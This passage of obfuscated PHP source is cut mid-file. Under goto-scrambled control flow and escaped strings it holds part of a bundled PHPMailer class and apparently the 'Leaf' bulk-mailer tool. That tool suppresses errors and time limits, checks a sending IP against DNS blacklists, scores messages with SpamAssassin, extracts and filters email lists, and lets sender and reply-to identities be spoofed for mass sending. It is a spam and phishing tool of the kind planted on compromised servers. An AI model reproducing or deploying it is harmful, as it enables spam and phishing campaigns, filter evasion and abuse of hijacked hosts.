Lhz2v: goto q3XeJ; FKYej: } public static function filenameToType($filename) { goto Q2hUJ; Q2hUJ: $qpos = strpos($filename, "\x3f"); goto iAc2q; HugKM: $pathinfo = self::mb_pathinfo($filename); goto bTJLX; bTJLX: return self::_mime_types($pathinfo["\x65\170\164\145\156\163\x69\x6f\156"]); goto DIzeu; iAc2q: if (!(false !== $qpos)) { goto Kl7NX; } goto TAEts; TAEts: $filename = substr($filename, 0, $qpos); goto Ui0rr; Ui0rr: Kl7NX: goto HugKM; DIzeu: } public static function mb_pathinfo($path, $options = null) { goto iYmxY; XcTwD: if (!array_key_exists(5, $pathinfo)) { goto y4ViE; } goto OxHTQ; VOGtS: $ret["\146\x69\x6c\x65\156\x61\155\x65"] = $pathinfo[3]; goto dXq_F; Uxhw7: if (!array_key_exists(2, $pathinfo)) { goto xD4g8; } goto F1uno; iKzdU: if (!array_key_exists(3, $pathinfo)) { goto bl7DE; } goto VOGtS; yf1AZ: IzcEx: goto NLZ1S; P41eY: switch ($options) { case PATHINFO_DIRNAME: case "\x64\x69\162\156\x61\x6d\145": return $ret["\144\151\x72\156\141\x6d\x65"]; case PATHINFO_BASENAME: case "\x62\141\163\145\156\x61\x6d\x65": return $ret["\142\141\x73\145\x6e\x61\x6d\145"]; case PATHINFO_EXTENSION: case "\145\170\x74\x65\x6e\163\x69\x6f\x6e": return $ret["\145\x78\164\145\156\163\151\x6f\156"]; case PATHINFO_FILENAME: case "\x66\x69\154\x65\x6e\141\155\x65": return $ret["\x66\x69\x6c\x65\156\x61\x6d\x65"]; default: return $ret; } goto bxJsR; WPo2b: kTojh: goto P41eY; Z2f0m: xD4g8: goto XcTwD; I78Ya: $pathinfo = array(); goto Y1zke; F1uno: $ret["\142\x61\163\x65\x6e\x61\x6d\x65"] = $pathinfo[2]; goto Z2f0m; Y1zke: if (!preg_match("\45\136\x28\x2e\52\x3f\x29\133\x5c\x5c\x2f\135\52\x28\x28\x5b\x5e\x2f\134\x5c\135\52\x3f\51\50\x5c\x2e\x28\133\x5e\x5c\x2e\134\x5c\57\x5d\53\x3f\51\x7c\51\51\133\134\x5c\x2f\x5c\56\135\x2a\44\x25\x69\x6d", $path, $pathinfo)) { goto kTojh; } goto Ymhav; cEpqD: y4ViE: goto iKzdU; Ymhav: if (!array_key_exists(1, $pathinfo)) { goto duGgn; } goto NpQQt; OxHTQ: $ret["\x65\170\x74\145\156\x73\151\157\x6e"] = $pathinfo[5]; goto cEpqD; NpQQt: $ret["\144\x69\x72\156\141\x6d\x65"] = $pathinfo[1]; goto f31Fj; dXq_F: bl7DE: goto WPo2b; iYmxY: $ret = array("\x64\x69\x72\156\141\155\145" => '', "\x62\x61\x73\145\156\141\155\145" => '', "\x65\170\164\x65\156\163\151\157\156" => '', "\146\x69\x6c\145\x6e\141\155\x65" => ''); goto I78Ya; bxJsR: RZAbn: goto yf1AZ; f31Fj: duGgn: goto Uxhw7; NLZ1S: } public function set($name, $value = '') { goto oC0oX; qayPP: $this->setError($this->lang("\x76\x61\x72\151\141\142\x6c\x65\137\x73\145\x74") . $name); goto FsVq1; oC0oX: if (property_exists($this, $name)) { goto Yca83; } goto qayPP; ZVS3V: $this->{$name} = $value; goto lBRu9; lBRu9: return true; goto TbbpN; S7jsM: goto AwJ7U; goto pMW6C; TbbpN: AwJ7U: goto DKtX7; FsVq1: return false; goto S7jsM; pMW6C: Yca83: goto ZVS3V; DKtX7: } public function secureHeader($str) { return trim(str_replace(array("\xd", "\xa"), '', $str)); } public static function normalizeBreaks($text, $breaktype = "\xd\xa") { return preg_replace("\57\x28\x5c\162\x5c\156\x7c\x5c\162\x7c\x5c\156\51\x2f\x6d\163", $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass, $extracerts_filename = '') { goto L0gLu; L0gLu: $this->sign_cert_file = $cert_filename; goto aLc1E; qAwYs: $this->sign_key_pass = $key_pass; goto z7nm3; aLc1E: $this->sign_key_file = $key_filename; goto qAwYs; z7nm3: $this->sign_extracerts_file = $extracerts_filename; goto ZQMWo; ZQMWo: } public function DKIM_QP($txt) { goto V6SNh; zHtBU: goto SH5Hy; goto lxJgT; lxJgT: wPuR5: goto LteWC; uh0MY: if (!($i < strlen($txt))) { goto wPuR5; } goto DjRxO; IbVyC: $line .= $txt[$i]; goto hUsT7; V6SNh: $line = ''; goto CqAns; r3N2o: z8ICs: goto IbVyC; Ilr2v: uktRM: goto HVruP; Aje9N: if (0x21 <= $ord && $ord <= 0x3a || $ord == 0x3c || 0x3e <= $ord && $ord <= 0x7e) { goto z8ICs; } goto ae8nk; cgoHX: SH5Hy: goto uh0MY; DjRxO: $ord = ord($txt[$i]); goto Aje9N; hUsT7: on3j0: goto Ilr2v; CqAns: $i = 0; goto cgoHX; ae8nk: $line .= "\75" . sprintf("\x25\60\62\130", $ord); goto CAg0E; LteWC: return $line; goto FkNDO; CAg0E: goto on3j0; goto r3N2o; HVruP: $i++; goto zHtBU; FkNDO: } public function DKIM_Sign($signHeader) { goto c898B; jLgEt: YcLzQ: goto pnJD1; Z6cv5: goto EvA0j; goto JBoEb; cAQtl: if (version_compare(PHP_VERSION, "\65\56\63\x2e\60") >= 0 and in_array("\163\150\x61\62\x35\66\x57\151\x74\x68\x52\x53\101\105\156\143\x72\x79\x70\164\151\x6f\156", openssl_get_md_methods(true))) { goto fzvpv; } goto du8J9; JBoEb: fzvpv: goto s7dDS; thJ6D: xqjMZ: goto cAQtl; KX260: return base64_encode($signature); goto lJJKo; HzKIe: throw new phpmailerException($this->lang("\x65\170\164\x65\156\x73\x69\x6f\x6e\x5f\155\151\163\163\x69\156\x67") . "\157\x70\145\156\163\x73\154"); goto jLgEt; COver: $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); goto thJ6D; Ta2TM: $pslen = $pinfo["\x62\x69\164\163"] / 8 - (strlen($t) / 2 + 3); goto u3Esn; ACWRM: if (!$this->exceptions) { goto YcLzQ; } goto HzKIe; htgpU: goto xqjMZ; goto HJqIZ; Cv4RZ: openssl_pkey_free($privKey); goto ZMtpu; NQ9bA: EvA0j: goto Cv4RZ; EHM8J: $hash = hash("\x73\x68\141\x32\x35\x36", $signHeader); goto uL2O2; DLDrQ: nLuTT: goto spImz; NkE4b: openssl_pkey_free($privKey); goto KX260; du8J9: $pinfo = openssl_pkey_get_details($privKey); goto EHM8J; aJ3Kr: openssl_pkey_free($privKey); goto sxqBY; uL2O2: $t = "\63\60\63\61\x33\x30\60\x64\x30\66\x30\71\x36\60\70\x36\64\x38\60\61\x36\x35\x30\x33\60\64\60\x32\60\x31\60\x35\60\60\60\x34\x32\60" . $hash; goto Ta2TM; hNz1G: if (!openssl_private_encrypt($eb, $signature, $privKey, OPENSSL_NO_PADDING)) { goto wLGJW; } goto NkE4b; spImz: $privKeyStr = !empty($this->DKIM_private_string) ? $this->DKIM_private_string : file_get_contents($this->DKIM_private); goto DMkmq; pnJD1: return ''; goto DLDrQ; s7dDS: if (!openssl_sign($signHeader, $signature, $privKey, "\163\150\x61\62\x35\x36\127\151\x74\150\x52\x53\101\x45\156\143\162\171\x70\x74\151\x6f\x6e")) { goto oino4; } goto aJ3Kr; HJqIZ: H9Il2: goto COver; lJJKo: wLGJW: goto Z6cv5; sxqBY: return base64_encode($signature); goto RwluB; FP2GU: $privKey = openssl_pkey_get_private($privKeyStr); goto htgpU; ZMtpu: return ''; goto ubwK3; DMkmq: if ('' != $this->DKIM_passphrase) { goto H9Il2; } goto FP2GU; c898B: if (defined("\120\113\x43\x53\x37\137\x54\x45\130\x54")) { goto nLuTT; } goto ACWRM; RwluB: oino4: goto NQ9bA; u3Esn: $eb = pack("\x48\52", "\60\x30\x30\x31" . str_repeat("\x46\x46", $pslen) . "\60\x30" . $t); goto hNz1G; ubwK3: } public function DKIM_HeaderC($signHeader) { goto Hwnlr; xbvlO: ZraQD: goto jV7k6; Sg_HT: return $signHeader; goto Czo7r; FkLo1: foreach ($lines as $key => $line) { goto AqOeX; RGEnF: vOTB1: goto LTnUF; c3hwb: $heading = strtolower($heading); goto VkoZG; VkoZG: $value = preg_replace("\x2f\134\x73\x7b\x32\x2c\175\57", "\40", $value); goto ei_BQ; ei_BQ: $lines[$key] = $heading . "\72" . trim($value); goto RGEnF; AqOeX: list($heading, $value) = explode("\x3a", $line, 2); goto c3hwb; LTnUF: } goto xbvlO; RTM0P: $lines = explode("\15\12", $signHeader); goto FkLo1; Hwnlr: $signHeader = preg_replace("\x2f\134\x72\134\x6e\134\163\x2b\57", "\x20", $signHeader); goto RTM0P; jV7k6: $signHeader = implode("\15\xa", $lines); goto Sg_HT; Czo7r: } public function DKIM_BodyC($body) { goto fMydO; FAqSG: Hedzt: goto pKn3k; pKn3k: return $body; goto IJaMR; UZ7Mx: if (!(substr($body, strlen($body) - 4, 4) == "\15\12\15\12")) { goto Hedzt; } goto RmqPI; yRXmB: GVwQt: goto kFuOv; RmqPI: $body = substr($body, 0, strlen($body) - 2); goto aFWYV; l0JzK: return "\15\12"; goto yRXmB; fFR_v: $body = str_replace("\xa", "\15\xa", $body); goto AHjGv; fMydO: if (!($body == '')) { goto GVwQt; } goto l0JzK; kFuOv: $body = str_replace("\xd\12", "\xa", $body); goto fFR_v; AHjGv: hqVnZ: goto UZ7Mx; aFWYV: goto hqVnZ; goto FAqSG; IJaMR: } public function DKIM_Add($headers_line, $subject, $body) { goto DTQWP; dDIiM: $date_header = ''; goto sSdfO; tgwlS: $ident = ''; goto fecQx; DTQWP: $DKIMsignatureType = "\162\163\x61\55\x73\x68\x61\x32\x35\x36"; goto phLAo; wrQZl: $toSign = $this->DKIM_HeaderC($from_header . "\15\xa" . $to_header . "\xd\xa" . $date_header . "\15\xa" . $subject_header . "\15\12" . $dkimhdrs); goto lUNtm; yv1gO: $subject_header = "\x53\x75\142\x6a\x65\x63\x74\x3a\x20{$subject}"; goto c08uX; qLIey: if ('' == $this->DKIM_identity) { goto MKiNR; } goto JkuBF; VZURy: $DKIMb64 = base64_encode(pack("\110\52", hash("\163\150\x61\62\65\66", $body))); goto qLIey; KWLwO: goto ZYM3h; goto mE4d2; jw3CA: $dkimhdrs = "\x44\113\111\x4d\55\x53\151\x67\x6e\x61\164\165\x72\145\x3a\x20\166\75\x31\x3b\x20\141\x3d" . $DKIMsignatureType . "\x3b\40\x71\x3d" . $DKIMquery . "\x3b\40\154\75" . $DKIMlen . "\x3b\40\x73\75" . $this->DKIM_selector . "\73\15\12" . "\11\164\75" . $DKIMtime . "\x3b\40\143\75" . $DKIMcanonicalization . "\73\xd\xa" . "\x9\150\x3d\x46\x72\157\155\x3a\124\x6f\72\x44\x61\164\x65\72\123\x75\x62\x6a\145\x63\x74\73\15\xa" . "\11\x64\x3d" . $this->DKIM_domain . "\73" . $ident . "\xd\xa" . "\11\172\75{$from}\15\xa" . "\11\174{$to}\15\xa" . "\x9\x7c{$date}\15\xa" . "\11\174{$subject}\73\15\12" . "\x9\142\x68\x3d" . $DKIMb64 . "\73\15\12" . "\x9\142\75"; goto wrQZl; lUNtm: $signed = $this->DKIM_Sign($toSign); goto JTqgb; JkuBF: $ident = "\x20\151\75" . $this->DKIM_identity . "\73"; goto KWLwO; pw8jY: $to_header = ''; goto dDIiM; l0XXQ: $DKIMlen = strlen($body); goto VZURy; mE4d2: MKiNR: goto tgwlS; Bbx1K: foreach ($headers as $header) { goto ZXV24; RGodY: if (strpos($header, "\124\157\x3a") === 0) { goto HOh7w; } goto p5u40; v7lhn: goto yovrp; goto j2YO1; Mn9ih: if (!empty(${$current}) && strpos($header, "\40\75\77") === 0) { goto LmoPE; } goto WWkP2; ZQQAO: HOh7w: goto iDoBm; YveAW: Pqh1_: goto W7Qfk; W7Qfk: $from_header = $header; goto GF91N; LEIsZ: $current = "\x64\141\x74\145\x5f\150\x65\x61\144\x65\x72"; goto Bk2cd; WWkP2: $current = ''; goto yp4qw; WDUAi: $date_header = $header; goto LEIsZ; iDoBm: $to_header = $header; goto pjFqG; pjFqG: $current = "\x74\157\x5f\150\x65\141\x64\x65\x72"; goto v7lhn; Bk2cd: yovrp: goto IeCh2; dCIRM: ${$current} .= $header; goto S60HV; CLb6L: goto yovrp; goto ZQQAO; S60HV: j2SL4: goto N2M2X; ZXV24: if (strpos($header, "\x46\x72\x6f\155\72") === 0) { goto Pqh1_; } goto RGodY; GF91N: $current = "\x66\162\157\155\x5f\150\145\x61\x64\145\x72"; goto CLb6L; p5u40: if (strpos($header, "\104\141\164\145\72") === 0) { goto MoBZr; } goto Mn9ih; IeCh2: kKlcq: goto g_zwy; lBa4z: LmoPE: goto dCIRM; yp4qw: goto j2SL4; goto lBa4z; j2YO1: MoBZr: goto WDUAi; N2M2X: goto yovrp; goto YveAW; g_zwy: } goto UA1qU; sSdfO: $current = ''; goto Bbx1K; c08uX: $headers = explode($this->LE, $headers_line); goto KDeWd; fecQx: ZYM3h: goto jw3CA; owtoO: $from = str_replace("\x7c", "\x3d\x37\103", $this->DKIM_QP($from_header)); goto WwlM0; JTqgb: return $dkimhdrs . $signed . "\xd\12"; goto WGBQj; QpWCj: $DKIMquery = "\x64\x6e\x73\x2f\164\170\164"; goto scnFs; WwlM0: $to = str_replace("\174", "\x3d\67\x43", $this->DKIM_QP($to_header)); goto P_sCA; KDeWd: $from_header = ''; goto pw8jY; UA1qU: ubfFk: goto owtoO; fMhcM: $body = $this->DKIM_BodyC($body); goto l0XXQ; phLAo: $DKIMcanonicalization = "\162\145\154\141\170\x65\x64\x2f\x73\x69\155\160\154\145"; goto QpWCj; XJ3XX: $subject = str_replace("\174", "\75\x37\103", $this->DKIM_QP($subject_header)); goto fMhcM; P_sCA: $date = str_replace("\x7c", "\75\67\103", $this->DKIM_QP($date_header)); goto XJ3XX; scnFs: $DKIMtime = time(); goto yv1gO; WGBQj: } public static function hasLineLongerThanMax($str) { return (bool) preg_match("\57\x5e\50\x2e\x7b" . (self::MAX_LINE_LENGTH + 2) . "\54\x7d\51\x2f\x6d", $str); } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { goto t1F9u; oLLXn: $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); goto Bbsk8; t1F9u: if (!(!empty($this->action_function) && is_callable($this->action_function))) { goto vGR7M; } goto oLLXn; Bbsk8: call_user_func_array($this->action_function, $params); goto kFD8F; kFD8F: vGR7M: goto U7vKn; U7vKn: } } goto aEFQc; hY533: quk7_: goto lRHZ9; mOjXb: tknkG: goto s5P1A; MfEoJ: $_POST["\145\155\141\x69\154\114\151\x73\164"] = strtolower($_POST["\145\x6d\x61\x69\x6c\x4c\151\x73\x74"]); goto MPOpO; yN03v: $host = ''; goto BgcaH; c0pgb: goto Spd00; goto hiGRi; ql2wL: print "\74\164\x72\76\40\x3c\164\x64\76{$host}\x3c\57\x74\x64\76\40\x3c\x74\144\x20\151\x64\x3d\47{$host}\47\x3e\103\150\145\x63\x6b\x69\x6e\x67\40\56\56\x3c\57\164\x64\x3e\74\x2f\164\x72\76"; goto c3vuW; gMJYH: foreach ($_GET["\x68\x6f\163\164"] as $host) { goto zDThr; qPU0L: F58A_: goto Tg1VL; h27wW: YpykN: goto EK1Qf; KOB_y: $check = "\x3c\146\157\x6e\164\40\143\157\x6c\157\x72\75\x27\147\x72\145\145\156\47\76\x20\103\x6c\x65\x61\x6e\x3c\x2f\x66\x6f\x6e\x74\76"; goto FBYco; EK1Qf: $check = "\74\146\x6f\156\x74\40\x63\157\x6c\x6f\162\75\x27\162\145\144\47\x3e\x20\x4c\x69\163\x74\x65\x64\x3c\x2f\146\157\x6e\164\x3e"; goto qPU0L; zDThr: if (checkdnsrr($_GET["\x63\150\145\143\x6b\x5f\x69\x70"] . "\56" . $host . "\x2e", "\x41")) { goto YpykN; } goto KOB_y; Tg1VL: print "\144\157\143\x75\x6d\145\x6e\164\56\x67\x65\164\x45\154\x65\x6d\145\156\x74\102\x79\111\x64\x28\42" . $host . "\x22\51\56\151\156\x6e\145\x72\x48\x54\115\x4c\40\x3d\40\42" . $check . "\42\73"; goto DryW4; DryW4: UMDaO: goto MGmcj; FBYco: goto F58A_; goto h27wW; MGmcj: } goto y4FDN; DLRV4: $host = $dnsbl_lookup[$j]; goto gpOKf; Y0NON: $mail->Encoding = $encoding; goto ttreH; fwOV5: $charset = $_POST["\x63\x68\x61\162\x73\145\x74"]; goto nVWJq; WHJ2Y: $mail->addReplyTo(leafClear($replyTo, $email)); goto jRVRQ; j0qyd: goto EVXFQ; goto Ee0AM; Q3H1w: $leaf["\167\145\142\x73\151\164\x65"] = "\154\x65\x61\146\x6d\x61\151\x6c\145\162\x2e\160\x77"; goto z1B6s; qfDfc: $mail = new PHPMailer(); goto TUIYE; f5wYm: h0L1d: goto H5Klu; aEFQc: class phpmailerException extends Exception { public function errorMessage() { $errorMsg = "\x3c\163\x74\x72\157\x6e\147\x3e" . htmlspecialchars($this->getMessage()) . "\x3c\57\x73\x74\162\x6f\x6e\x67\76\x3c\x62\162\40\x2f\76\xa"; return $errorMsg; } } goto wZV6G; Me2qE: if (empty($_FILES["\146\x69\x6c\145\124\x6f\x55\x70\154\157\x61\144"]["\164\155\160\137\x6e\141\x6d\145"])) { goto iUdyH; } goto emQBd; fFVOy: exit; goto Gb7fw; eXXbP: qJ3u4: goto XoKUL; EJFng: Gqzg1: goto qfDfc; VYJWD: ini_set("\155\x65\155\x6f\x72\x79\137\x6c\151\155\151\x74", -1); goto XjI7W; REe_u: $replyTo = leafTrim($_POST["\162\x65\160\154\x79\124\157"]); goto o7fzp; CxBqc: $i = $i + 10; goto ozylK; FpfZS: UucX1: goto u0wbV; Ms0J2: pzcZN: goto A2jxO; vHa4Y: Spd00: goto pi6kT; jRVRQ: $mail->addAddress("\165\163\145\162\156\141\155\x65\100\144\x6f\x6d\141\x69\156\x2e\x63\157\155"); goto g_ZnK; KJXun: foreach ($emails as $email) { goto WK0qp; sEm0S: yTuch: goto EFl02; WK0qp: foreach ($keywords as $keyword) { goto MjSwE; j0r5q: XDcb1: goto kLX2B; qvkMr: print $email . "\xa"; goto uNHOg; S07gR: eV4aN: goto j0r5q; uNHOg: goto yTuch; goto S07gR; MjSwE: if (!strstr($email, $keyword)) { goto eV4aN; } goto qvkMr; kLX2B: } goto sEm0S; EFl02: S3jUW: goto iWIHo; iWIHo: } goto Ys1Qd; Rs7mx: exit; goto Ms0J2; b17Xr: if (!($i < $dnsT)) { goto EV_yj; } goto yN03v; jOrC_: if (!isset($_GET["\150\x6f\163\164"])) { goto ESyWn; } goto fwIGh; nUE1N: AsUeS: goto b17Xr; WBM_Z: print "\xd\12\40\40\x20\x20\74\146\x6f\x72\x6d\40\x61\143\x74\151\157\x6e\75\x22\x3f\x65\155\141\151\x6c\x66\151\x6c\164\145\162\75\151\x66\x72\x61\155\42\x20\x6d\x65\164\x68\157\x64\75\x22\x50\x4f\123\x54\x22\x20\x74\x61\x72\147\145\164\75\x22\155\171\55\x69\146\162\x61\155\x65\x22\x20\145\156\143\164\x79\x70\145\75\42\155\x75\154\164\151\x70\x61\x72\x74\57\x66\157\x72\x6d\x2d\x64\141\164\x61\x22\x20\157\x6e\163\x75\x62\155\151\x74\x3d\47\47\76\xd\xa\40\x20\x20\x20\x20\x20\40\x20\74\x6c\x61\142\x65\154\x20\146\x6f\x72\x3d\x22\145\x6d\x61\x69\x6c\x4c\x69\x73\x74\x22\x3e\x54\x65\170\x74\x20\x3c\57\x6c\141\142\x65\154\76\x3c\x69\x6e\x70\165\164\40\x74\171\160\x65\x3d\42\146\x69\x6c\x65\x22\40\156\141\x6d\x65\75\42\x66\151\154\145\124\157\x55\160\x6c\x6f\141\x64\x22\40\x69\144\x3d\42\146\151\154\145\x54\157\125\160\x6c\157\141\144\42\76\40\xd\xa\40\40\40\40\40\40\40\x20\x6f\162\15\12\15\12\x20\x20\x20\x20\40\40\40\40\74\x74\145\170\x74\x61\x72\145\x61\x20\x6e\x61\x6d\145\75\42\145\x6d\x61\x69\x6c\x4c\x69\x73\x74\42\x20\151\144\75\x22\x65\x6d\x61\x69\154\x4c\x69\x73\x74\x22\40\143\x6c\141\163\163\75\42\146\x6f\x72\155\x2d\143\x6f\156\x74\x72\157\x6c\42\x20\x72\157\x77\x73\x3d\42\67\x22\40\x69\x64\75\42\x74\x65\x78\x74\101\162\x65\x61\42\76\74\x2f\x74\x65\x78\x74\x61\x72\x65\x61\76\15\xa\40\40\40\x20\40\x20\x3c\x64\x69\x76\x20\143\154\x61\163\x73\x3d\x22\143\157\154\x2d\x6c\147\x2d\61\62\x22\x3e\xd\xa\40\40\x20\40\x20\40\40\x20\x3c\144\x69\x76\40\143\154\141\x73\x73\x3d\x22\x72\x61\x64\x69\x6f\x22\76\15\xa\x20\x20\x20\x20\x20\40\x20\40\x20\40\x3c\154\x61\142\145\x6c\x3e\xd\xa\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\74\151\156\160\165\164\x20\x74\x79\x70\x65\75\42\x72\141\x64\151\157\42\40\156\x61\x6d\145\75\42\162\x65\x73\x75\x6c\164\164\171\160\145\42\x20\x69\144\x3d\x22\x72\145\163\165\154\x74\164\x79\x70\145\42\x20\x76\x61\x6c\x75\x65\x3d\x22\x68\x65\x72\x65\42\x20\x63\150\x65\x63\x6b\145\144\75\x22\x22\x3e\xd\12\40\40\40\40\x20\x20\40\40\x20\40\40\x20\x53\x68\x6f\x77\40\x52\x65\163\x75\x6c\164\x20\151\x6e\x20\164\x68\x69\x73\x20\x70\141\147\145\15\xa\40\40\x20\x20\40\40\x20\x20\x20\40\74\x2f\154\x61\142\x65\154\x3e\xd\12\x20\40\40\40\x20\x20\x20\40\74\57\x64\151\166\x3e\15\xa\x20\40\40\x20\x20\40\x20\x20\x3c\144\x69\166\40\143\154\x61\x73\163\75\42\162\x61\x64\x69\x6f\x22\x3e\xd\xa\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x3c\154\x61\x62\145\x6c\x3e\xd\xa\x20\x20\x20\40\40\x20\40\40\x20\40\x20\40\x3c\151\x6e\x70\x75\164\40\x74\x79\160\145\75\42\x72\141\144\x69\157\x22\40\156\x61\x6d\145\x3d\42\162\x65\163\165\154\x74\x74\x79\160\x65\x22\x20\151\144\75\x22\162\x65\x73\x75\x6c\x74\164\171\160\145\42\40\x76\141\x6c\165\x65\75\x22\x64\157\167\156\x6c\157\x61\144\x22\x3e\15\12\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x44\x6f\x77\x6e\154\x6f\x61\144\x20\122\145\163\165\x6c\164\x20\x28\x66\157\x72\x20\x62\151\147\40\156\165\x6d\x62\x65\x72\x73\x29\15\12\x20\40\40\x20\x20\x20\x20\x20\40\40\x3c\x2f\154\x61\x62\x65\x6c\76\xd\12\x20\40\x20\40\x20\x20\x20\40\74\57\x64\x69\x76\x3e\xd\xa\x20\40\40\x20\40\x20\74\x2f\144\151\x76\76\15\12\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\x3c\x6c\145\147\x65\x6e\x64\76\74\x68\64\76\105\170\x74\162\x61\143\164\40\105\155\141\151\x6c\x3c\57\x68\64\76\74\57\x6c\x65\x67\145\156\x64\76\xd\12\40\40\40\40\x20\40\x20\40\40\40\40\40\104\x65\x74\x65\143\x74\151\156\147\x20\x65\x76\145\x72\x79\40\x65\155\141\151\x6c\x20\50\61\60\60\45\51\40\x61\x6e\144\x20\157\162\144\x65\x72\40\164\x68\x65\x6d\x20\154\x69\156\145\40\x62\171\40\x6c\x69\x6e\145\40\x3c\142\x72\x3e\74\x62\162\76\xd\xa\x20\x20\40\x20\x20\x20\40\x20\74\142\x75\x74\164\x6f\156\x20\164\x79\x70\x65\x3d\x22\x73\x75\142\x6d\151\164\x22\40\x6e\141\155\x65\x3d\42\163\x75\142\155\151\x74\x22\40\166\141\x6c\165\145\75\42\145\170\x74\x72\141\x63\164\42\40\143\154\141\x73\163\x3d\42\142\x74\156\x20\142\164\156\x2d\x64\x65\x66\x61\165\154\x74\40\142\x74\x6e\x2d\x73\x6d\42\x3e\x53\164\141\162\x74\x3c\x2f\142\x75\164\x74\157\x6e\x3e\xd\12\40\40\x20\40\40\x20\40\40\40\40\x20\x20\74\154\145\x67\145\x6e\x64\x3e\x3c\x68\x34\76\x46\151\x6c\164\145\x72\40\x45\155\x61\151\x6c\163\x3c\x2f\x68\x34\x3e\74\57\154\145\147\x65\x6e\x64\x3e\xd\xa\x20\x20\x20\40\x20\x20\x20\x20\x3c\154\141\142\x65\x6c\x20\76\113\x65\x79\x77\x6f\162\144\163\x20\74\163\155\141\x6c\x6c\x3e\x20\x65\170\x3a\40\147\155\141\151\x6c\x2e\143\157\155\x20\157\162\x20\56\143\157\56\x75\x6b\74\57\x73\x6d\x61\154\154\x3e\40\x3c\x2f\x6c\x61\142\145\x6c\x3e\x3c\x74\145\x78\x74\x61\x72\x65\x61\x20\x6e\141\155\x65\75\x22\153\145\171\x77\157\x72\144\x73\x22\40\151\x64\x3d\x22\x6b\145\x79\167\157\x72\x64\163\42\x20\143\x6c\x61\x73\x73\75\x22\x66\157\162\155\x2d\143\157\x6e\164\x72\x6f\x6c\42\40\x72\x6f\x77\x73\x3d\42\64\42\x20\151\144\75\x22\164\145\x78\x74\101\x72\145\x61\42\76\x67\x6d\141\151\x6c\56\143\157\x6d\xd\xa\x68\x6f\x74\x6d\x61\151\x6c\56\x63\157\155\15\12\x79\x61\x68\x6f\x6f\56\x63\157\x6d\xd\xa\56\x63\x6f\x2e\165\x6b\x3c\57\164\x65\170\164\141\162\x65\x61\x3e\74\x62\162\x3e\15\12\15\xa\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x3c\142\165\164\164\157\156\x20\x74\x79\160\145\x3d\42\163\x75\142\155\151\164\42\40\x6e\x61\x6d\x65\75\42\163\165\x62\155\151\x74\42\40\x76\x61\x6c\x75\145\75\42\146\x69\x6c\164\145\162\x22\x20\143\154\x61\163\x73\x3d\42\142\x74\156\x20\142\164\156\x2d\144\145\x66\141\165\x6c\164\x20\142\x74\x6e\x2d\163\155\x22\76\x53\x74\141\162\x74\74\x2f\x62\x75\164\164\x6f\x6e\76\xd\12\40\x20\40\x20\74\57\x66\157\162\155\76\xd\12\40\40\40\40\74\154\141\142\x65\x6c\x20\x3e\x52\x65\163\x75\x6c\164\40\74\x2f\154\141\142\x65\x6c\x3e\xd\xa\x20\40\x20\x20\x3c\151\x66\x72\141\x6d\145\40\163\164\171\x6c\x65\75\42\x62\157\x72\x64\145\x72\72\x6e\157\156\x65\73\167\x69\144\x74\150\x3a\61\60\60\x25\x3b\x22\40\x6e\x61\155\x65\75\x22\x6d\171\x2d\x69\146\162\141\x6d\145\42\40\x20\x73\162\x63\x3d\42\77\145\x6d\141\151\x6c\146\x69\x6c\x74\x65\162\75\x69\146\x72\x61\155\x22\40\76\x3c\x2f\151\x66\x72\x61\155\145\76\15\12\x20\x20\40"; goto Xd0nv; hiGRi: u1pqC: goto wMJ5F; Thk8I: if (!(!empty($password) and $_SESSION[$sessioncode] != $password)) { goto sQR84; } goto zKaff; r3dcQ: $base64 = "\163\x65\x6c\145\143\164\x65\144"; goto Jo4FD; t43OY: $mail->IsHTML(true); goto i7AUS; o13zo: MOhFt: goto f569P; Ys1Qd: JEDcA: goto lK3ol; XjI7W: $leaf["\166\145\x72\x73\151\157\156"] = "\62\56\x38"; goto Q3H1w; bHJZt: if ($score > 5) { goto MM5a6; } goto Edq_I; MGDZr: goto Spd00; goto EJFng; hZYLo: XZJ3i: goto d5yGC; EsRP3: $maillist = explode("\xd\12", $emailList); goto qMmJL; Oh1mF: $class = "\144\x61\x6e\147\x65\x72"; goto eXXbP; Uhbo6: if (leafMailCheck($senderEmail)) { goto tknkG; } goto VOftw; oUswT: g5F3N: goto vHa4Y; s5P1A: ZXhnB: goto ZeFgG; LH62b: session_write_close(); goto XvOGW; oFLJT: ESyWn: goto yx6Cn; dOFRG: set_time_limit(0); goto VYJWD; XalPm: pKBfm: goto iXic1; H5Klu: if ($encoding == "\x37\142\x69\x74") { goto HVenp; } goto XV2PK; eGY8G: error_reporting(0); goto dOFRG; wA9LI: $response = curl_exec($ch); goto kgyoy; gXCVf: goto qJ3u4; goto f0dGM; XoKUL: print "\74\x64\151\166\x20\x63\x6c\141\x73\x73\75\42\x74\x65\170\x74\x2d" . $class . "\x22\76\x59\157\165\162\x20\123\160\x61\x6d\x41\163\x73\141\x73\x73\x69\x6e\40\x73\143\157\162\145\x20\x69\163\x20" . $score . "\40\x20\x3c\x2f\144\x69\x76\x3e\xd\12\74\x64\151\166\x3e\x46\165\154\154\40\122\x65\160\x6f\162\164\x20\x3a\x20\x3c\x70\x72\x65\x3e" . $response->report . "\74\x2f\x70\162\145\x3e\74\57\x64\x69\166\x3e"; goto EUn2J; M3Xj1: print "\103\x68\x65\x63\153\x69\x6e\147\x20\x3c\x62\x3e" . $_GET["\143\150\145\x63\x6b\137\151\x70"] . "\x3c\57\x62\76\40\151\x6e\x20\x3c\x62\x3e{$dnsT}\74\x2f\142\x3e\x20\x20\x61\156\164\x69\x2d\163\x70\141\155\x20\x64\x61\x74\141\142\141\163\145\163\x3a\74\x62\162\76"; goto dCGmt; ttreH: $mail->preSend(); goto aBS1v; Js1_Q: dq0rA: goto MYUks; CpJBk: $senderName = leafTrim($_POST["\163\145\156\x64\145\162\x4e\x61\x6d\145"]); goto REe_u; k53cc: if ($_POST["\155\x65\163\163\141\147\145\x54\x79\160\x65"] == 2) { goto MH90C; } goto unaP7; PPUHW: wz0S2: 